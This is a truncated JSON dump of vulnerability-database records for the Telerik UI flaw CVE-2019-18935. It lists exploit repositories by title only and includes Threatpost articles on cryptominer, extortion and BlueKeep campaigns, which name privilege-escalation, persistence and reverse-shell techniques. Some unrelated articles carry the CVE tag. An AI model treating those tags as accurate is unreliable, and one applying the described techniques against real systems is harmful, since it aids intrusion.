{"githubexploit": [{"lastseen": "2022-08-09T01:53:05", "description": "# CVE-2019-18935\n\nProof-of-concept exploit for a .NET JSON deser...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-12T07:58:11", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2022-08-08T17:58:54", "id": "A04C30E0-722D-5CF4-B80A-547C1C702024", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:34:15", "description": "# TelerikUI Python Scanner\r\n(telerik_rce_scan.py)\r\n<img align=\"c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-26T20:57:11", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-07-21T15:53:50", "id": "92BBBF7B-026E-553A-883B-AEF503046C18", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:30:16", "description": "# TelerikUI Python Scanner\r\n(telerik_rce_scan.py)\r\n<img align=\"c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-25T08:37:51", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-08-17T19:04:54", "id": "05081BAE-6AEB-5206-8BEC-6D067EE4B660", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-29T23:42:45", "description": "# RAU_crypto\n[![Language](https://img.shields.io/badge/Lang-Pyth...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-09T13:53:57", "type": "githubexploit", "title": "Exploit for Inadequate Encryption Strength in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935", "CVE-2017-9248", "CVE-2017-11317", "CVE-2017-11357"], "modified": "2021-12-29T14:28:46", "id": "46B4DA3A-0DEC-5F0E-980A-B17A1CB688F1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# RAU_crypto\n[![Language](https://img.shields.io/badge/Lang-Pyth...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-05-29T07:29:52", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11357", "CVE-2019-18935", "CVE-2017-11317", "CVE-2017-9248"], "modified": "2022-02-07T03:27:52", "id": "6AF629CA-DC22-5740-AC2B-CA18189D299D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "threatpost": [{"lastseen": "2020-05-07T21:56:19", "description": "An unusual cryptocurrency miner, dubbed LoudMiner, is spreading via pirated copies of Virtual Studio Technology. It uses virtualization software to mine Monero on a Tiny Core Linux virtual machine \u2013 a unique approach, according to researchers.\n\nVirtual Studio Technology (VST) is an audio plug-in software interface that integrates software synthesizers and effects in digital audio workstations. The idea is to simulate traditional recording studio functions. ESET analysts recently uncovered a WordPress-based website hawking trojanized packages that incorporate the popular software, including Propellerhead Reason, Ableton Live, Reaktor 6, AutoTune and others. In all, there are 137 VST-related applications (42 for Windows and 95 for macOS) available for download on the site.\n\nUpon downloading, an unwitting audiophile\u2019s computer would be infVirtual Studio Technology (VST)ected with LoudMiner, which consists of the VST application bundled with virtualization software, a Linux image and additional files used to achieve persistence. It uses the XMRig cryptominer hosted on a virtual machine. So far, three Mac versions and one Windows variant of the malware have been uncovered.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cRegarding the nature of the applications targeted, it is interesting to observe that their purpose is related to audio production,\u201d wrote Michal Malik, researcher at ESET, [in a posting](<https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/>) on Thursday. \u201cThus, the machines that they are installed on should have good processing power and high CPU consumption will not surprise the users.\u201d\n\nBecause the victim would also get a functioning version of the application that they expected, the attackers gain some air cover.\n\n\u201cThese applications are usually complex, so it is not unexpected for them to be huge files,\u201d Malik explained. \u201cThe attackers use this to their advantage to camouflage their virtual machine (VM) images.\u201d\n\nDespite the efforts at camouflage, victims quickly become aware that something\u2019s amiss, thanks to system slowdowns, according to [forum postings](<https://discussions.apple.com/thread/8602989>).\n\n\u201cUnfortunately, had to reinstall OSX, the problem was that Ableton Live 10, which I have downloaded it from a torrent site and not from the official site, installs a miner too, running at the background causing this,\u201d said a user named \u201cMacloni.\u201d\n\n\u201cThe same user attached screenshots of the Activity Monitor indicating 2 processes \u2013 qemu-system-x86_64 and tools-service \u2013 taking 25 percent of CPU resources and running as root,\u201d said Malik, adding that some users found a full 100 percent of their CPU capacity hijacked.\n\n## Using a Virtual Machine\n\nLoudMiner uses QEMU on macOS and VirtualBox on Windows to connect to a Linux image running on a VM \u2013 more specifically, it\u2019s a Tiny Core Linux 9.0 image configured to run XMRig. The victim\u2019s machine is added to a mining pool that the Linux image uses for CPU power.\n\nMalik noted that that the decision by the malware authors to use VMs for performing the mining instead of hosting it locally on the victim\u2019s computer is \u201cquite remarkable and this is not something we routinely see\u201d \u2013 although it\u2019s not unheard of for legitimate miners to [deploy the strategy](<https://medium.com/@Jayvdb/how-to-start-mining-cryptocurrency-for-fun-and-possibly-profit-71517859ed91>) to save money.\n\n\u201cUser downloads the application and follows attached instructions on how to install it. LoudMiner is installed first, the actual VST software after,\u201d he explained. \u201cLoudMiner hides itself and becomes persistent on reboot. The Linux virtual machine is launched and [the mining starts](<https://threatpost.com/cryptomining-malware-uninstalls-cloud-security-products/140959/>). Scripts inside the virtual machine can contact the C2 server to update the miner.\u201d\n\nHe said that in order to identify a particular mining session, a file containing the IP address of the machine and the day\u2019s date is created by the \u201cidgenerator\u201d script and its output is sent to the C2 server by the \u201cupdater.sh script.\u201d\n\nBecause LoudMiner uses a mining pool, it\u2019s impossible to retrace potential transactions to find out how successful the adversaries have been thus far, he added.\n\nTo avoid the threat, age-old advice applies: Don\u2019t download pirated copies of commercial software. Malik also offered some hints to identify when an application contains unwanted code. Red flags include a trust popup from an unexpected, \u201cadditional\u201d installer; high CPU consumption by a process one did not install (QEMU or VirtualBox in this case); a new service added to the startup services list; and network connections to curious domain names (such as system-update[.]info or system-check[.]services).\n", "cvss3": {}, "published": "2019-06-20T19:53:23", "type": "threatpost", "title": "LoudMiner Cryptominer Uses Linux Image and Virtual Machines", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-18935"], "modified": "2019-06-20T19:53:23", "id": "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8", "href": "https://threatpost.com/loudminer-cryptominer-linux/145871/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-07T21:57:53", "description": "A researcher has created a proof-of-concept Metasploit module for the critical BlueKeep vulnerability, which successfully demonstrates how to achieve complete takeover of a target Windows machine.\n\nReverse engineer Z\u01dd\u0279osum0x0 [tweeted about his success](<https://twitter.com/zerosum0x0/status/1135866953996820480>) on Tuesday, noting that he plans to keep the module private given the danger that a working exploit could pose to the vast swathe of unpatched systems out there. He also released a video showing a remote code-execution (RCE) exploit working on a Windows 2008 desktop, paired with a Mimikatz tool to harvest login credentials. In about 22 seconds, he achieved full takeover.\n\n\u201cStill too dangerous to release, lame sorry,\u201d he tweeted. \u201cMaybe after first mega-worm?\u201d\n\nAn [earlier proof-of-concept (PoC) from McAfee](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/>) showed a successful RCE exploit, but didn\u2019t include the credential-harvesting \u2013 so a mitigating factor in that exploit would be the need for an attacker to bypass network-level authentication protections. \n[](<https://threatpost.com/newsletter-sign/>)The BlueKeep vulnerability (CVE-2019-0708) RCE flaw exists in Remote Desktop Services and impacts older version of Windows, including Windows 7, Windows XP, Server 2003, Server 2008 and Server 2008 R2. The main thing that sets BlueKeep apart is the fact that it\u2019s wormable \u2013 and so it can self-propagate from machine to machine, setting up the scene for a [WannaCry-level, fast-moving infection wave](<https://threatpost.com/the-wannacry-security-legacy-and-whats-to-come/144607/>).\n\nThe concern is big enough that Microsoft even took the unusual step of deploying patches to Windows XP and Windows 2003, which are end-of-life and no longer supported by the computing giant. It has also issued multiple follow-on advisories urging administrators to patch.\n\nThe new exploit works on most vulnerable machines, with the exception of Windows Server 2003, according to Z\u01dd\u0279osum0x0. The researcher [said that it took time](<https://twitter.com/zerosum0x0/status/1135219212199186434>) to develop the exploit, but clearly it can be achieved.\n\nThe National Security Agency concurs with the engineer on the possibility of widespread, in-the-wild exploitation.\n\n\u201cIt is likely only a matter of time before remote exploitation code is widely available for this vulnerability,\u201d the NSA said in [an advisory](<https://www.us-cert.gov/ncas/current-activity/2019/06/04/NSA-Releases-Advisory-BlueKeep-Vulnerability>) on Tuesday. \u201cNSA is concerned that malicious cyber-actors will use the vulnerability in ransomware and exploit kits containing other known exploits, increasing capabilities against other unpatched systems.\u201d\n\nThe danger isn\u2019t just the potential for a worm-wave; denial-of-service could be a problem too. Researchers attempting to create PoC exploits found that their efforts [largely caused systems to crash](<https://www.exploit-db.com/exploits/46946>) before they could achieve RCE.\n\nTo boot, the attack surface is unfortunately large. Although Microsoft issued a patch for the recently disclosed BlueKeep as part of its [May Patch Tuesday](<https://threatpost.com/microsoft-patches-zero-day/144742/>) Security Bulletin (and there\u2019s a [micropatch](<https://0patch.com/patches.html>) out there too), [researchers said last week](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) that at least 1 million devices linked to the public internet are still vulnerable to the bug. And, the NSA in its advisory warned that the number could actually be in the multimillions.\n\nSome are finding patching to be an onerous process given that many older machines are in production environments where the required reboot \u2013 taking mission-critical systems offline \u2014 just isn\u2019t feasible.\n\n> But patch deployment will take 35 days and we cant deploy to 18.24% because downtime issues and we've raised the requests for the rest into the change tool and \u2026\u2026..\n> \n> \u2014 Taz Wake (@tazwake) [June 4, 2019](<https://twitter.com/tazwake/status/1135890835101368321?ref_src=twsrc%5Etfw>)\n\nNonetheless, with the demonstration that RCE can be achieved, hopefully administrators will find a way to update their environments.\n\n\u201cIt only takes one vulnerable computer connected to the internet to provide a potential gateway into these corporate networks, where advanced malware could spread, infecting computers across the enterprise,\u201d Microsoft warned in [an advisory](<https://blogs.technet.microsoft.com/msrc/2019/05/30/a-reminder-to-update-your-systems-to-prevent-a-worm/>). \u201cThis scenario could be even worse for those who have not kept their internal systems updated with the latest fixes, as any future malware may also attempt further exploitation of vulnerabilities that have already been fixed.\u201d\n", "cvss3": {}, "published": "2019-06-05T14:14:47", "type": "threatpost", "title": "BlueKeep 'Mega-Worm' Looms as Fresh PoC Shows Full System Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0708", "CVE-2019-18935"], "modified": "2019-06-05T14:14:47", "id": "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "href": "https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:25:29", "description": "A Monero cryptocurrency-mining campaign has emerged that exploits a known vulnerability in public-facing web applications built on the ASP.NET open-source web framework.\n\nThe campaign has been dubbed Blue Mockingbird by the analysts at Red Canary that discovered the activity. Research uncovered that the cybercriminal gang is exploiting a deserialization vulnerability, [CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>), which can allow remote code execution. The bug is found in the Progress Telerik UI front-end offering for ASP.NET AJAX.\n\nAJAX stands for Asynchronous JavaScript and XML; It\u2019s used to add script to a webpage which is executed and processed by the browser. Progress Telerik UI is an overlay for controlling it on ASP.NET implementations.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerability lies specifically in the RadAsyncUpload function, according to the writeup on the bug in the National Vulnerability Database. This is exploitable when the encryption keys are known (via another exploit or other attack), meaning that any campaign relies on a chaining of exploits.\n\nIn the current attacks, Blue Mockingbird attackers are uncovering unpatched versions of Telerik UI for ASP.NET, deploying the [XMRig Monero-mining payload](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) in dynamic-link library (DLL) form on Windows systems, then executing it and establishing persistence using multiple techniques. From there, the infection propagates laterally through the network.\n\nThe activity appears to stretch back to December, according to the analysis, and continued through April at least.\n\nXMRig is open-source and can be compiled into custom tooling, according to the analysis. Red Canary has observed three distinct execution paths: Execution with rundll32.exe explicitly calling the DLL export fackaaxv; execution using regsvr32.exe using the /s command-line option; and execution with the payload configured as a Windows Service DLL.\n\n\u201cEach payload comes compiled with a standard list of commonly used Monero-mining domains alongside a Monero wallet address,\u201d explained researchers at Red Canary, in a [Thursday writeup](<https://redcanary.com/blog/blue-mockingbird-cryptominer/>). \u201cSo far, we\u2019ve identified two wallet addresses used by Blue Mockingbird that are in active circulation. Due to the private nature of Monero, we cannot see the balance of these wallets to estimate their success.\u201d\n\nTo establish persistence, Blue Mockingbird actors must first elevate their privileges, which they do using various techniques; for instance, researchers observed them using a JuicyPotato exploit to escalate privileges from an IIS Application Pool Identity virtual account to the NT Authority\\SYSTEM account. In another instance, the Mimikatz tool (the official signed version) was used to access credentials for logon.\n\nArmed with the proper privileges, Blue Mockingbird leveraged multiple persistence techniques, including the use of a COR_PROFILER COM hijack to execute a malicious DLL and restore items removed by defenders, according to Red Canary.\n\n\u201cTo use COR_PROFILER, they used wmic.exe and Windows Registry modifications to set environment variables and specify a DLL payload,\u201d the writeup explained.\n\nBlue Mockingbird likes to move laterally to distribute mining payloads across an enterprise, added researchers. The attackers do this by using their elevated privileges and Remote Desktop Protocol (RDP) to access privileged systems, and then Windows Explorer to then distribute payloads to remote systems.\n\nAlthough Blue Mockingbird has been making noticeable waves, the toolkit is a work in progress.\n\n\u201cIn at least one engagement, we observed Blue Mockingbird seemingly experimenting with different tools to create SOCKS proxies for pivoting,\u201d said the researchers. \u201cThese tools included a fast reverse proxy (FRP), Secure Socket Funneling (SSF) and Venom. In one instance, the adversary also tinkered with PowerShell reverse TCP shells and a reverse shell in DLL form.\u201d\n\nIn terms of preventing the threat, patching web servers, web applications and dependencies of the applications to inhibit initial access is the best bet, according to Red Canary.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. _**[**_On May 13 at 2 p.m. ET_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_, join Valimail security experts and Threatpost for a FREE webinar, _**[**_5 Proven Strategies to Prevent Email Compromise_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_. Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please _**[**_register here _**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_for this sponsored webinar._**\n\n_**Also, don\u2019t miss our latest on-demand webinar from DivvyCloud and Threatpost, **_[_**A Practical Guide to Securing the Cloud in the Face of Crisis**_](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_**, with critical, advanced takeaways on how to avoid cloud disruption and chaos.**_\n", "cvss3": {}, "published": "2020-05-07T21:01:37", "type": "threatpost", "title": "Blue Mockingbird Monero-Mining Campaign Exploits Web Apps", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-18935", "CVE-2020-5135"], "modified": "2020-05-07T21:01:37", "id": "THREATPOST:A94AAFAF28062A447CCD0F4C47FFD78C", "href": "https://threatpost.com/blue-mockingbird-monero-mining/155581/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-13T11:25:12", "description": "In less time than it takes to get a stuffed crust pizza delivered, a new group called SnapMC can breach an organization\u2019s systems, steal their sensitive data, and demand payment to keep it from being published, according to a new [report from NCC Group\u2019s threat intelligence team](<https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/>) \u2014 no ransomware required.\n\nRather than disrupting business operations by locking down a target\u2019s data and systems, SnapMC just focuses on straight-up extortion. However, this low-tech, ransomware-free approach to extortion on a compressed timeline relies on known vulnerabilities with patches readily available.\n\n\u201cIn the extortion emails we have seen from SnapMC have given victims 24 hours to get in contact and 72 hours to negotiate,\u201d the report said. \u201cThese deadlines are rarely abided by, since we have seen the attacker to start increasing the pressure well before countdown hits zero.\u201d\n\nThe researchers weren\u2019t able to link the group to any known threat actors and gave it the name for it\u2019s speed (\u201cSnap\u201d) and its mc.exe exfiltration tool of choice.\n\nAs evidence the group has the data, SnapMC provides victims with a list of the exfiltrated data. If they fail to engage in negotiations within the timeframe, the attackers threaten to publish the data and report the breach to customers and the media.\n\nAnalysts said they\u2019ve observed SnapMC successfully breaching unpatched and vulnerable VPNs using the [CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) remote code execution bug in Telerik UI for ASPX.NET, and webserver apps using SQL injections.\n\n## **VPN Vulnerabilities **\n\nA recent rise in VPN vulnerabilities has left companies exposed, according to Hank Schless, a senior manager with Lookout cloud security.\n\n\u201cWhile VPN solutions have their place, there have been multiple stories of vulnerabilities within these solutions that were exploited in the wild,\u201d Schless explained to Threatpost. \u201cEnsuring that only authorized and secure users or devices can access corporate infrastructure requires zero trust network access (ZTNA) policies for on-premise or private apps and cloud access security broker (CASB) capabilities for cloud-based apps and infrastructure.\u201d\n\nLast June the Colonial Pipeline was breached with an [old VPN password](<https://threatpost.com/darkside-pwned-colonial-with-old-vpn-password/166743/>). And last July [SonicWall issued a patch](<https://threatpost.com/sonicwall-vpn-bugs-attack/167824/>) for a bug in its old VPN models no longer supported by the company after attacks came to light \u2014 which were part of an ongoing wider campaign to exploit ([CVE-2019-7418](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-7481>)).\n\nThe following month, [Cisco Systems issued a handful of patches](<https://threatpost.com/critical-cisco-bug-vpn-routers/168449/>) for the 8,800 Gigabit VPN routers vulnerable to compromise through [CVE-2021-1609](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1609>).\n\nAnd by late last month, the National Security Agency (NSA) and Cybersecurity and Infrastructure Security Agency (CSIA) issued guidance to the Department of Defense, National Security Systems and the Defense Industrial Base to [harden their VPNs](<https://threatpost.com/vpns-nsa-cisa-guidance/175150/>) against threats from multiple nation-state advanced persistent threat (APT) actors.\n\nNation-state actors aside, basic patching would protect against this latest smash-and-grab attempt at data extortion from the likes of SnapMC.\n\n## **Ransomware\u2019s Evolution **\n\nOliver Tavakoli, CTO with Vectra, said that getting rid of the encryption piece of the attack altogether is a \u201cnatural evolution\u201d of the ransomware [business model](<https://threatpost.com/ransomware-volumes-record-highs-2021/168327/>). The NCC team likewise predicts the trend toward simple attacks on shorter timelines is likely to continue.\n\n\u201cNCC Group\u2019s Threat Intelligence team predicts that data-breach extortion attacks will increase over time, as it takes less time, and even less technical in-depth knowledge or skill in comparison to a full-blown ransomware attack,\u201d the team said. \u201cTherefore, making sure you are able to detect such attacks in combination with having an incident response plan ready to execute at short notice, is vital to efficiently and effectively mitigate the threat SnapMC poses to your organization.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online **_](<https://threatpost.com/category/webinars/>)_**_town halls_**__** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-13T11:22:00", "type": "threatpost", "title": "30 Mins or Less: Rapid Attacks Extort Orgs Without Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935", "CVE-2019-7418", "CVE-2021-1609"], "modified": "2021-10-13T11:22:00", "id": "THREATPOST:7EE86D3945B51C9DF608A4C06739A5F7", "href": "https://threatpost.com/rapid-attacks-extort-ransomware/175445/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-07T21:58:06", "description": "A high-severity bug has been found that allows remote attackers to hijack Cisco\u2019s enterprise-class Industrial Network Director. The vulnerability was made public Wednesday along with a patch; there are no workarounds for the bug and [a software patch is required](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190605-ind-rce>), Cisco said.\n\nCisco\u2019s Industrial Network Director is a network management platform for visualizing industrial assets, and securing and managing them.\n\n\u201cThe vulnerability (CVE-2019-1861) is due to improper validation of files uploaded to the affected application,\u201d [Cisco wrote in its security advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190605-ind-rce>). \u201cAn attacker could exploit this vulnerability by authenticating to the affected system using administrator privileges and uploading an arbitrary file. A successful exploit could allow the attacker to execute arbitrary code with elevated privileges.\u201d \n[](<https://threatpost.com/newsletter-sign/>)\n\nImpacted are versions of Industrial Network Director prior to the 1.6.0 release.\n\n## Additional High-Severity Bugs\n\nOne Wednesday Cisco also released a fix for an additional high-severity flaw found in TelePresence VCS and multiple releases of its Unified Communications Manager (versions X8.1 to X12.5.2) products.\n\n\u201cA vulnerability in the authentication service of the Cisco Unified Communications Manager IM and Presence (Unified CM IM&P) Service, Cisco TelePresence Video Communication Server (VCS) and Cisco Expressway Series could allow an unauthenticated, remote attacker to cause a service outage for users attempting to authenticate, resulting in a denial of service condition,\u201d Cisco [wrote in its advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190605-cucm-imp-dos>) on the bug (CVE-2019-1845).\n\nThe vulnerability traces back to insufficient controls for specific memory operations, it said.\n\nMeanwhile, on Monday, Cisco also [released an update to a high-severity denial-of-service vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-iosxr-evpn-dos>) (CVE-2019-1849), originally made public on May 15.\n\nCisco said this bug impacts routers running a vulnerable release of Cisco IOS XR Software and that are participating in a Border Gateway Protocol (BGP) Multiprotocol Label Switching (MPLS)-based Ethernet VPN (EVPN).\n\n\u201c[An] implementation of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to trigger a denial-of-service condition on an affected device,\u201d Cisco wrote.\n\nAnd also of note, on Thursday Cisco released a patch for a [medium-severity remote file injection bug](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-cuic-cmdinj>) (CVE-2019-1860). On Wednesday it released patches for an [additional seven medium-severity vulnerabilities](<https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir#~Vulnerabilities>).\n\nLast month, Cisco had an unusually busy patching month, tackling everything from a critical vulnerability in the [Cisco Elastic Services Controller](<https://threatpost.com/critical-flaw-in-cisco-elastic-services-controller-allows-full-system-takeover/144452/>), [a high-severity bug](<https://threatpost.com/cisco-bugs-unpatched-millions-devices/144692/>) in its web-based user interface (Web UI) of the Cisco IOS XE Software and [a flaw in the Secure Boot trusted hardware root-of-trust](<https://threatpost.com/cisco-patch-firmware/144936/>) affecting several model routers, switches and firewalls \u2014 this latter bug is still not patched for many of the millions of devices it affects.\n\n**_Ransomware is on the rise: _****_[Don\u2019t miss our free Threatpost webinar ](<https://attendee.gotowebinar.com/register/611039692762707715?source=enews>)_****_on the ransomware threat landscape, June 19 at 2 p.m. ET. _****_Join _****_Threatpost_****_and a panel of experts as they discuss_****_ how to manage the risk associated with this unique attack type,_** **_with exclusive insights into new developments on the ransomware front and how to stay ahead of the attackers._**\n", "cvss3": {}, "published": "2019-06-06T17:43:57", "type": "threatpost", "title": "High-Severity Bug in Cisco Industrial Enterprise Tool Allows RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1845", 